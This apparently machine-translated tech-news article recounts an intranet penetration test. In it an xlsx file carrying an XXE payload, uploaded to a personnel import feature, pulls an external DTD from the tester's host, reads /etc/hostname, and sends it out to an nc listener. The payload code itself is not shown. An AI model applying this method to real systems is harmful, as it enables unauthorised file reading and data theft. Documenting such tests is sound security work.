Shulou(Shulou.com)06/01 Report--

Today, I will talk to you about how to use Excel to carry out XXE attacks. Many people may not know much about it. In order to make you understand better, the editor has summarized the following for you. I hope you can get something from this article.

In one test, the XXE attack was triggered by uploading Excel files in the background of a certain system, and this posture was rarely used successfully, so the record of the test process was shared here.

Preface

Microsoft Office introduced the new open XML file format from version 2007. The new XML file format is based on the compressed ZIP file format specification and consists of many parts.

We can unzip it into a specific folder to see the folders and files it contains, and we can find that most of them are XML files that describe workbook data, metadata, and document information.

Therefore, there is also the possibility of XXE attacks when incorrectly reading Microsoft office files in version 2007.

Testing process

Both the test client and the test target are in a pure intranet environment.

Test target IP:29.xx.xx.xxx

Client IP:10.xx.xx.xx

In the personnel Management > batch Import module, it is found that the personnel information can be imported in bulk by uploading Excel files.

Download the import template, which is an xls format file.

Xls is different from xlsx format, xls is a unique binary format, its core structure is the structure of compound document type, while the core structure of xlsx is the structure of XML type, which adopts the compression method based on XML. Xls format files cannot be inserted into Payload for XXE attacks.

Since the default template user.xls given by the system cannot be used, is it feasible for us to try to create a new xlsx format file to upload?

Make a xlsx file inserted into Payload

Create a new xlsx format file test.xlsx and extract it.

Insert Payload in the [Content_Types] .xml file, as shown below. The function is to read the eval.dtd file from the 10.xx.xx.xx:8080.

Monitor on the client side

The eval.dtd file is stored on the client side, as shown in the following figure. The function is to read the / etc/hostname file of the test target through the file protocol and bring out the read result through the parameter p of the HTTP request.

Open the Web service on port 8080 of the client for the test target to download the eval.dtd file.

And use nc to listen on local port 8081 to receive / etc/hostname files read from the test target.

Upload

Recompress the file inserted into Payload, and then change the suffix name of the compressed package to xlsx.

Upload the xlsx file.

Although the echo file addition failed, it was found from the client Web service log that the test target downloaded the evil.dtd file, and nc successfully heard the / etc/hostname file contents of the test target on port 8081.

It is very simple to use Excel to carry out XXE attacks. When parsing Excel files with a lower version of a third-party library, the XXE problem will be introduced.

After reading the above, do you have any further understanding of how to use Excel to conduct XXE attacks? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.